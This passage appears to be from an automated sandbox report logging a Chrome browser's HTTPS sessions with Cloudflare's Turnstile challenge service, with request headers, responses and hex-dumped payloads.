                                                                                                        2024-10-04 13:11:25 UTC120INData Raw: 46 69 6c 65 20 74 68 61 74 20 61 63 74 73 20 6c 69 6b 65 20 61 20 4b 69 6c 6c 20 73 77 69 74 63 68 20 66 6f 72 20 53 4d 53 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 69 6e 20 52 65 61 64 65 72 2e 20 44 65 6c 65 74 65 20 74 68 69 73 20 66 69 6c 65 20 74 6f 20 65 6e 61 62 6c 65 20 74 68 65 20 6b 69 6c 6c 20 73 77 69 74 63 68 20 69 6e 20 52 65 61 64 65 72 2e
                                                                                                        Data Ascii: File that acts like a Kill switch for SMS functionality in Reader. Delete this file to enable the kill switch in Reader.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.1649735104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:25 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:25 UTC349INHTTP/1.1 404 Not Found
                                                                                                        Date: Fri, 04 Oct 2024 13:11:25 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: ucxcG1PTqsf+j/LdHVAurPXJh7Ee7BNY4H4=$8+Tdv71uiyAdP1Gh
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56aefbb5bc351-EWR
                                                                                                        2024-10-04 13:11:25 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.1649736104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:25 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cd56adf1e4c7ce7/1728047484358/48e1015a2d24b58034bfdd5402f79a57ea9323b37e0924aa7d29e54bfe487ea4/RoID7XXaQ-k-wPE HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: max-age=0
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:25 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                        Date: Fri, 04 Oct 2024 13:11:25 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 1
                                                                                                        Connection: close
                                                                                                        2024-10-04 13:11:25 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 53 4f 45 42 57 69 30 6b 74 59 41 30 76 39 31 55 41 76 65 61 56 2d 71 54 49 37 4e 2d 43 53 53 71 66 53 6e 6c 53 5f 35 49 66 71 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gSOEBWi0ktYA0v91UAveaV-qTI7N-CSSqfSnlS_5IfqQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                        2024-10-04 13:11:25 UTC1INData Raw: 4a
                                                                                                        Data Ascii: J


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.1649737104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:26 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cd56adf1e4c7ce7/1728047484359/cSCIqWMfG6sfcGK HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:26 UTC170INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:26 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56af4cee70f7d-EWR
                                                                                                        2024-10-04 13:11:26 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4d 00 00 00 64 08 02 00 00 00 4c c8 2a 19 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRMdL*IDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.1649738104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:26 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cd56adf1e4c7ce7/1728047484359/cSCIqWMfG6sfcGK HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:26 UTC170INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:26 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56af8bd404337-EWR
                                                                                                        2024-10-04 13:11:26 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4d 00 00 00 64 08 02 00 00 00 4c c8 2a 19 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRMdL*IDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.1649739104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:27 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 31445
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: c6eaeb7329255dd
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:27 UTC16384OUTData Raw: 76 5f 38 63 64 35 36 61 64 66 31 65 34 63 37 63 65 37 3d 35 31 4e 55 2d 61 64 25 32 62 59 39 59 42 4b 6b 6e 6a 7a 6a 38 39 4e 42 66 6a 48 6a 58 55 4b 24 61 6c 64 6f 6a 61 24 64 67 64 45 6a 4b 37 6b 44 61 64 63 6a 42 24 42 67 6a 62 67 6a 50 44 37 50 6e 64 46 6a 43 37 4e 6a 6f 32 6a 67 6d 6a 63 55 50 32 38 6f 6a 61 72 36 6a 77 55 36 71 59 70 6a 67 37 64 66 6a 4e 24 42 36 39 54 50 6a 61 6c 4b 71 55 77 6c 4f 38 74 36 58 41 67 66 64 6a 76 43 35 76 5a 24 75 77 6a 6a 50 39 6a 50 57 24 2b 2b 24 42 6c 39 6a 64 2b 77 50 46 4f 33 73 56 67 6c 64 6b 6c 75 67 71 61 4e 30 76 76 51 7a 37 59 77 4e 76 4c 48 71 6a 64 53 38 42 41 50 50 24 6a 6b 6a 67 58 39 2b 6e 4b 43 6a 42 35 39 54 46 67 58 72 36 45 2b 66 6a 64 35 4e 4f 71 51 70 30 30 43 66 6c 54 30 71 6b 67 6a 55 59 43 49
                                                                                                        Data Ascii: v_8cd56adf1e4c7ce7=51NU-ad%2bY9YBKknjzj89NBfjHjXUK$aldoja$dgdEjK7kDadcjB$BgjbgjPD7PndFjC7Njo2jgmjcUP28ojar6jwU6qYpjg7dfjN$B69TPjalKqUwlO8t6XAgfdjvC5vZ$uwjjP9jPW$++$Bl9jd+wPFO3sVgldklugqaN0vvQz7YwNvLHqjdS8BAPP$jkjgX9+nKCjB59TFgXr6E+fjd5NOqQp00CflT0qkgjUYCI
                                                                                                        2024-10-04 13:11:27 UTC15061OUTData Raw: 77 65 46 50 45 6a 68 7a 67 76 77 6a 61 52 51 6f 55 2d 6a 58 38 69 59 77 7a 68 54 4e 31 55 58 33 4d 52 49 5a 59 50 31 6a 52 6f 36 6a 39 55 42 59 6a 50 6a 64 66 61 5a 6a 70 6a 39 4b 61 58 6a 41 31 76 24 64 6e 6a 65 6a 64 4e 64 67 6a 45 24 69 73 6a 4b 6a 73 6a 4e 4e 42 4a 6a 4e 6a 64 4e 6a 74 24 50 6a 69 4e 64 39 6a 49 55 61 6a 42 30 6a 47 55 6b 59 64 24 6a 54 67 50 4b 6a 4a 6a 5a 55 77 6a 61 47 6a 4c 46 6a 24 64 72 6a 65 57 50 49 6a 6a 64 4f 24 77 37 61 36 6a 72 4a 72 4e 6a 6e 6a 33 33 52 4f 72 36 6a 4f 67 4f 53 4b 57 6a 2d 6a 35 4b 6a 6c 64 52 6a 78 6a 42 53 6a 4a 55 58 37 64 6e 6a 65 2b 67 76 42 61 64 69 6a 48 63 61 53 6a 54 44 38 71 61 34 37 48 59 69 24 6a 67 6a 58 6a 50 49 61 39 64 4e 55 68 55 61 6d 6a 5a 31 58 63 6a 6f 6a 4e 6a 67 55 6a 4b 6a 78 6a 69
                                                                                                        Data Ascii: weFPEjhzgvwjaRQoU-jX8iYwzhTN1UX3MRIZYP1jRo6j9UBYjPjdfaZjpj9KaXjA1v$dnjejdNdgjE$isjKjsjNNBJjNjdNjt$PjiNd9jIUajB0jGUkYd$jTgPKjJjZUwjaGjLFj$drjeWPIjjdO$w7a6jrJrNjnj33ROr6jOgOSKWj-j5KjldRjxjBSjJUX7dnje+gvBadijHcaSjTD8qa47HYi$jgjXjPIa9dNUhUamjZ1XcjojNjgUjKjxji
                                                                                                        2024-10-04 13:11:27 UTC300INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:27 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 26800
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: s9mqn3f/EGhK3WMJtrBrk/Q+INfOy5jMR9D3atLxz0cBsc5unqYYUMxgYsR8Z4KqSy/WHeiad/+GH/da$ULpl3L6NL66t/x9p
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56afdca6d7d0c-EWR
                                                                                                        2024-10-04 13:11:27 UTC1069INData Raw: 67 31 39 61 69 56 31 7a 61 56 57 44 5a 6d 6c 58 69 46 74 34 58 49 65 4a 66 5a 39 33 62 6f 2b 6a 65 33 4b 61 61 5a 52 33 64 58 61 48 69 49 4a 6a 62 36 56 75 71 72 53 78 71 48 6d 33 6a 70 4b 61 6c 4c 4e 36 6b 5a 65 66 6a 48 79 66 75 49 4f 43 6f 59 4b 6f 70 38 75 6c 78 36 6a 4f 70 74 44 56 31 37 69 31 6f 63 50 46 31 6f 2b 36 6c 35 6a 54 30 4f 4b 32 6f 71 50 61 73 2b 54 70 77 64 54 74 74 38 44 4d 38 74 76 64 37 2b 7a 57 30 73 6a 36 36 74 54 4f 74 62 76 78 75 74 65 2b 37 2b 4c 46 78 50 58 65 35 74 2f 45 78 74 76 6e 32 76 48 65 38 2b 34 4c 78 2b 73 4b 34 65 66 7a 38 2f 73 58 37 42 38 69 46 42 4c 79 41 65 44 31 43 42 34 62 33 50 30 71 43 65 6b 6a 2f 51 54 74 45 51 6f 65 46 65 38 6f 46 78 6b 75 44 69 6f 65 48 69 37 35 47 51 33 39 47 41 4c 39 4f 55 4d 46 52 42 6f
                                                                                                        Data Ascii: g19aiV1zaVWDZmlXiFt4XIeJfZ93bo+je3KaaZR3dXaHiIJjb6VuqrSxqHm3jpKalLN6kZefjHyfuIOCoYKop8ulx6jOptDV17i1ocPF1o+6l5jT0OK2oqPas+TpwdTtt8DM8tvd7+zW0sj66tTOtbvxute+7+LFxPXe5t/Extvn2vHe8+4Lx+sK4efz8/sX7B8iFBLyAeD1CB4b3P0qCekj/QTtEQoeFe8oFxkuDioeHi75GQ39GAL9OUMFRBo
                                                                                                        2024-10-04 13:11:27 UTC1369INData Raw: 32 39 7a 6c 70 4a 7a 73 37 6d 73 6a 33 57 52 73 4a 69 49 6d 4d 4a 31 67 4a 43 55 6f 63 6d 63 71 70 52 2b 74 5a 61 6b 77 4b 32 4a 7a 4d 32 39 74 71 43 4b 31 38 65 77 7a 4d 58 51 32 4e 32 35 72 73 32 69 76 4b 37 6e 32 72 47 67 32 62 6e 47 76 4b 6d 2f 79 72 37 51 76 38 76 6e 74 72 50 50 36 2b 62 4f 79 66 6a 30 2b 4e 7a 73 38 77 51 42 38 50 50 47 42 39 77 4e 43 64 77 51 2b 74 33 73 42 38 33 6d 39 65 48 72 31 75 34 4d 39 4f 6e 77 33 41 45 42 41 2b 2f 30 37 77 34 67 48 69 72 39 42 2f 77 57 42 6a 41 76 4a 51 7a 39 4c 77 4d 4b 45 79 63 44 46 52 67 36 39 42 51 61 44 52 41 50 48 77 42 41 52 6a 6b 63 41 68 34 39 4a 52 55 6c 54 77 49 4a 48 53 45 74 4a 31 46 4a 49 56 5a 48 56 7a 6f 64 4e 42 35 5a 54 79 30 77 49 46 42 63 5a 53 46 68 4a 55 45 39 52 30 68 72 4d 47 46 62
                                                                                                        Data Ascii: 29zlpJzs7msj3WRsJiImMJ1gJCUocmcqpR+tZakwK2JzM29tqCK18ewzMXQ2N25rs2ivK7n2rGg2bnGvKm/yr7Qv8vntrPP6+bOyfj0+Nzs8wQB8PPGB9wNCdwQ+t3sB83m9eHr1u4M9Onw3AEBA+/07w4gHir9B/wWBjAvJQz9LwMKEycDFRg69BQaDRAPHwBARjkcAh49JRUlTwIJHSEtJ1FJIVZHVzodNB5ZTy0wIFBcZSFhJUE9R0hrMGFb
                                                                                                        2024-10-04 13:11:27 UTC1369INData Raw: 47 77 73 49 78 7a 73 36 64 2b 6a 59 75 42 6c 5a 57 4f 67 38 4b 70 6e 49 62 46 68 59 43 4d 7a 4c 43 77 6b 4b 36 76 30 38 33 43 6c 73 61 36 30 4b 33 5a 6d 70 2b 34 74 4c 2b 63 7a 74 44 69 77 38 58 62 78 4e 72 63 75 4b 47 6d 76 4c 2f 74 36 4e 36 32 2b 4f 61 79 36 38 2b 33 76 63 72 37 2b 38 48 63 76 4e 6e 57 39 74 76 7a 38 73 6a 4c 37 4f 76 47 34 4f 48 35 44 66 54 6b 36 66 4c 76 31 76 41 63 36 41 62 7a 36 75 63 67 39 74 6e 30 46 41 37 7a 48 67 59 43 34 2b 55 41 43 75 59 41 35 78 49 44 44 44 49 30 44 7a 63 30 46 44 59 45 39 42 38 65 2f 52 6f 38 4f 50 34 76 46 52 73 6b 41 54 4d 31 52 78 55 6b 42 6a 74 49 51 68 30 47 43 79 45 6b 55 6b 31 44 47 31 31 4c 46 31 41 30 48 44 52 4e 4c 6d 41 77 5a 79 45 38 4d 6b 4a 6d 50 45 42 5a 58 32 35 77 53 33 4e 6f 55 6d 68 4e 63
                                                                                                        Data Ascii: GwsIxzs6d+jYuBlZWOg8KpnIbFhYCMzLCwkK6v083Clsa60K3Zmp+4tL+cztDiw8XbxNrcuKGmvL/t6N62+Oay68+3vcr7+8HcvNnW9tvz8sjL7OvG4OH5DfTk6fLv1vAc6Abz6ucg9tn0FA7zHgYC4+UACuYA5xIDDDI0Dzc0FDYE9B8e/Ro8OP4vFRskATM1RxUkBjtIQh0GCyEkUk1DG11LF1A0HDRNLmAwZyE8MkJmPEBZX25wS3NoUmhNc
                                                                                                        2024-10-04 13:11:27 UTC1369INData Raw: 37 67 62 32 44 6a 72 79 77 6b 72 79 37 70 70 57 66 70 34 7a 43 6f 4d 43 2f 75 35 4b 48 74 73 79 6f 69 35 54 44 6d 71 61 2b 31 4c 43 58 34 38 47 6b 78 4c 50 6a 74 71 4c 4a 75 39 2f 63 75 65 2f 48 71 36 54 79 30 65 71 30 79 73 58 54 73 37 58 4d 32 38 7a 67 38 39 66 4e 77 39 44 6b 76 75 6a 39 41 65 6e 69 44 75 34 4c 7a 77 58 78 35 77 6f 57 36 39 59 54 38 4e 63 53 37 51 2f 78 39 75 72 62 39 77 4c 75 46 52 44 39 49 43 54 30 2b 77 30 61 37 43 77 77 42 51 6b 30 2b 79 67 51 4b 2f 45 4d 44 7a 77 51 39 78 30 50 49 54 59 35 49 77 4a 46 4a 30 4d 49 50 54 64 49 48 42 6c 4b 4f 43 67 4f 4b 67 38 77 48 51 67 6b 4c 7a 45 56 54 69 31 4f 55 44 4e 41 51 52 51 79 52 56 52 41 50 45 67 31 50 44 52 55 4c 54 31 66 4b 6a 31 75 53 6c 31 68 64 6b 78 68 4c 33 42 76 57 45 56 66 62 6b
                                                                                                        Data Ascii: 7gb2Djrywkry7ppWfp4zCoMC/u5KHtsyoi5TDmqa+1LCX48GkxLPjtqLJu9/cue/Hq6Ty0eq0ysXTs7XM28zg89fNw9Dkvuj9AeniDu4LzwXx5woW69YT8NcS7Q/x9urb9wLuFRD9ICT0+w0a7CwwBQk0+ygQK/EMDzwQ9x0PITY5IwJFJ0MIPTdIHBlKOCgOKg8wHQgkLzEVTi1OUDNAQRQyRVRAPEg1PDRULT1fKj1uSl1hdkxhL3BvWEVfbk
                                                                                                        2024-10-04 13:11:27 UTC1369INData Raw: 76 72 36 6d 67 37 62 44 71 71 36 39 7a 63 2f 41 78 73 65 6d 79 6f 33 4c 6c 4b 2f 52 33 62 50 5a 76 73 6e 4e 31 4b 48 52 6f 74 50 44 6f 64 4c 55 36 61 54 42 34 4d 76 77 78 4c 43 79 79 4e 54 44 78 2f 6e 68 39 4c 50 74 32 73 7a 59 2f 4e 33 34 31 2f 36 39 34 4f 44 64 34 75 59 48 43 41 34 51 44 73 76 78 37 2b 58 68 36 4e 58 76 36 76 6f 49 31 78 50 50 45 65 38 4a 32 2f 50 56 48 50 63 48 38 4e 38 6a 4a 50 50 6b 4b 77 30 6a 47 69 45 76 4a 53 34 75 4a 2f 4d 36 4a 51 66 7a 43 6a 77 37 50 68 49 68 2b 53 45 46 47 68 42 42 49 6b 63 6d 50 7a 59 39 53 79 38 62 4d 78 4e 4e 51 42 4e 53 45 53 55 78 4b 78 4a 4f 46 6a 74 58 58 47 4a 56 4c 47 55 2f 49 45 55 7a 57 54 55 69 4f 53 34 6f 58 30 74 4f 51 57 31 4e 54 58 68 4e 62 56 64 62 54 48 63 32 57 44 2b 42 50 30 74 34 64 6e 36
                                                                                                        Data Ascii: vr6mg7bDqq69zc/Axsemyo3LlK/R3bPZvsnN1KHRotPDodLU6aTB4MvwxLCyyNTDx/nh9LPt2szY/N341/694ODd4uYHCA4QDsvx7+Xh6NXv6voI1xPPEe8J2/PVHPcH8N8jJPPkKw0jGiEvJS4uJ/M6JQfzCjw7PhIh+SEFGhBBIkcmPzY9Sy8bMxNNQBNSESUxKxJOFjtXXGJVLGU/IEUzWTUiOS4oX0tOQW1NTXhNbVdbTHc2WD+BP0t4dn6
                                                                                                        2024-10-04 13:11:27 UTC1369INData Raw: 34 62 44 70 49 71 6a 73 61 71 65 73 38 6e 47 77 72 4f 6a 31 38 79 63 7a 36 43 76 7a 37 75 74 6c 2b 44 51 75 2b 58 42 70 2b 47 66 37 2b 62 66 75 2b 58 54 7a 74 58 71 38 73 71 30 32 39 48 6b 31 73 6e 79 31 74 58 7a 38 2f 6f 41 31 39 7a 70 2b 74 2f 37 36 66 37 38 37 50 48 68 79 38 33 4e 36 41 49 58 32 42 62 69 32 66 44 6f 31 41 72 75 31 39 6a 37 38 64 63 56 38 74 34 6d 46 43 49 42 37 53 30 5a 35 76 48 36 45 2f 48 39 44 75 6b 34 2b 54 51 75 42 7a 6f 74 51 66 6f 4c 51 50 6e 37 44 7a 51 2b 45 51 41 4a 47 42 68 4b 4a 79 34 52 47 78 46 4b 4b 52 38 4e 4b 43 52 55 4d 30 30 7a 57 6a 63 2b 47 32 45 69 54 54 4e 6c 4f 31 41 66 61 56 56 4b 4b 6d 74 43 5a 55 42 78 62 56 31 42 64 58 42 69 53 48 5a 31 65 6b 67 2b 62 56 78 50 53 6a 6b 32 51 55 39 78 50 6d 43 49 68 58 68 4b
                                                                                                        Data Ascii: 4bDpIqjsaqes8nGwrOj18ycz6Cvz7utl+DQu+XBp+Gf7+bfu+XTztXq8sq029Hk1sny1tXz8/oA19zp+t/76f787PHhy83N6AIX2Bbi2fDo1Aru19j78dcV8t4mFCIB7S0Z5vH6E/H9Duk4+TQuBzotQfoLQPn7DzQ+EQAJGBhKJy4RGxFKKR8NKCRUM00zWjc+G2EiTTNlO1AfaVVKKmtCZUBxbV1BdXBiSHZ1ekg+bVxPSjk2QU9xPmCIhXhK
                                                                                                        2024-10-04 13:11:27 UTC1369INData Raw: 62 56 71 71 61 71 32 64 53 31 6e 4e 75 64 76 71 37 67 74 74 43 77 35 4f 44 59 74 65 6e 54 70 62 66 74 32 4f 43 35 38 63 62 67 77 50 4f 31 7a 73 4c 32 35 4e 62 4c 2b 37 33 65 7a 41 4c 73 31 73 30 47 38 4e 58 49 43 64 37 65 31 51 30 4a 43 65 45 52 2f 4f 4c 65 45 77 45 46 34 52 72 75 38 75 63 64 47 66 62 77 49 67 7a 64 37 69 55 52 2f 76 63 71 46 53 48 32 4c 69 6b 6c 41 53 38 64 42 77 63 30 39 53 45 43 4f 67 38 78 43 54 34 70 4e 41 46 41 41 68 63 55 52 41 59 58 47 55 6f 31 49 78 5a 4e 44 51 6f 63 55 52 49 6e 49 6c 5a 42 54 53 70 59 56 53 73 70 57 30 6b 37 4c 47 46 4e 57 54 42 6b 4a 6a 38 33 61 6c 55 36 4c 57 31 44 5a 54 31 78 62 55 39 48 64 47 46 58 51 6e 68 30 4e 6b 70 38 61 56 64 4d 67 45 4a 62 55 6f 5a 62 65 56 61 48 64 57 4e 63 6a 58 6c 72 58 70 4a 6e 59
                                                                                                        Data Ascii: bVqqaq2dS1nNudvq7gttCw5ODYtenTpbft2OC58cbgwPO1zsL25NbL+73ezALs1s0G8NXICd7e1Q0JCeER/OLeEwEF4Rru8ucdGfbwIgzd7iUR/vcqFSH2LiklAS8dBwc09SECOg8xCT4pNAFAAhcURAYXGUo1IxZNDQocURInIlZBTSpYVSspW0k7LGFNWTBkJj83alU6LW1DZT1xbU9HdGFXQnh0Nkp8aVdMgEJbUoZbeVaHdWNcjXlrXpJnY
                                                                                                        2024-10-04 13:11:27 UTC1369INData Raw: 52 72 74 71 64 31 4b 72 69 7a 4a 32 78 34 71 57 32 75 4f 58 6a 37 4c 62 73 33 71 33 47 76 65 7a 30 72 72 32 2b 7a 62 54 47 39 4c 6e 46 2f 73 66 6f 31 63 76 41 75 63 54 46 42 4c 33 44 30 76 63 42 34 4e 6f 49 45 65 59 51 44 51 44 52 34 4e 34 46 47 65 48 59 35 2f 77 66 44 76 63 62 49 50 7a 67 35 50 4d 52 34 67 58 38 2f 76 73 70 4b 77 67 70 42 2f 37 38 4e 51 41 4a 4d 4f 34 69 4f 79 6f 55 4e 7a 30 4a 2f 41 45 52 46 2f 34 68 47 52 73 6b 52 55 63 6b 42 69 4d 62 47 56 45 66 4a 55 77 4c 51 56 64 47 4d 46 4e 5a 57 78 6b 64 4c 52 34 62 50 54 55 33 55 6d 46 6e 50 6c 49 78 4d 69 6c 65 54 47 39 70 50 30 56 78 4d 6c 4e 4d 51 7a 5a 32 57 48 64 4f 66 44 70 4a 52 32 32 42 53 6b 46 51 63 34 64 32 64 56 30 38 69 48 68 4a 6a 49 6c 39 61 46 39 52 69 6d 52 56 68 57 36 59 61 6f
                                                                                                        Data Ascii: Rrtqd1KrizJ2x4qW2uOXj7Lbs3q3Gvez0rr2+zbTG9LnF/sfo1cvAucTFBL3D0vcB4NoIEeYQDQDR4N4FGeHY5/wfDvcbIPzg5PMR4gX8/vspKwgpB/78NQAJMO4iOyoUNz0J/AERF/4hGRskRUckBiMbGVEfJUwLQVdGMFNZWxkdLR4bPTU3UmFnPlIxMileTG9pP0VxMlNMQzZ2WHdOfDpJR22BSkFQc4d2dV08iHhJjIl9aF9RimRVhW6Yao


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.1649740104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:28 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
